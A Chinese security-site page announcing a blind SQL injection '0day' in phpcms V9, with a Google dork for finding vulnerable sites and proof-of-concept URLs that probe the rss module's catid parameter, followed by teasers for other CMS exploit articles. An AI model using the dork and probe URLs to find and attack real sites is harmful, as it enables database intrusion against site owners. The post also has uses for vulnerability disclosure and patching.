当前位置：代码网 > 服务器>网络安全>漏洞分析 > phpcms V9 BLind SQL 注入漏洞0day

phpcms V9 BLind SQL 注入漏洞0day

phpcms V9 BLind SQL 注入漏洞0day　　影响版本：phpcms v9 blind 　phpcms v9 blind 参数过滤存在SQL注入漏洞。... 11-03-11

　　影响版本：phpcms v9 blind

　　官方网站：http://www.phpcms.cn

　　漏洞类型：sql注入

　　漏洞描述：phpcms v9 blind 参数过滤存在sql注入漏洞。

　　google dork:inurl:"index.php?m=content+c=rss+catid=10"

　　exploit & p0c

　　[!] index.php?m=content&c=rss&catid=[valid catid]

　　example p0c

　　[!] http://host/index.php?m=content&c=rss&catid=10 <= true

　　[!] http://host/index.php?m=content&c=rss&catid=-10 <= false

　　[+] http://host/index.php?m=content&c=rss&catid=5 <= show mysql error (table)

万能密码漏洞以及修复

万能密码漏洞以及修复　　万能密码漏洞以及修复　　记得几年前要入侵一个企业网站超级简单　　一般只需要找到后台还有后台通常是www.xxx.com/admi... [阅读全文]
dedecms织梦 v5.5 两处跨站漏洞

dedecms织梦 v5.5 两处跨站漏洞　　影响版本: 　　dedecms织梦5.5 　　漏洞描述: 　　demo1:http://www.dedecms.... [阅读全文]
DEDECMS任意修改文章漏洞(exp)

DEDECMS任意修改文章漏洞(exp)　　这个漏洞不足以得到马儿但能修改任何文章也算是一个严重的漏洞!　　废话不说　　经典对白看代码!　　member... [阅读全文]
ecshop爆绝对路径的bug

ecshop爆绝对路径的bug　　ecshop爆绝对路径的bug 　　网址如下" 　　http://www.zzfhw.com/ECShop/inc... [阅读全文]
eWebeditor漏洞的修补

eWebeditor漏洞的修补　　漏洞原理　　漏洞的利用原理很简单，请看Upload.asp文件：　　任何情况下都不允许上传asp脚本文件　　sAllo... [阅读全文]
PHP漏洞全解

PHP漏洞全解PHP网页的安全性问题，针对PHP的网站主要存在下面几种攻击方式... 11-03-11 [阅读全文]


验证码：

相关文章: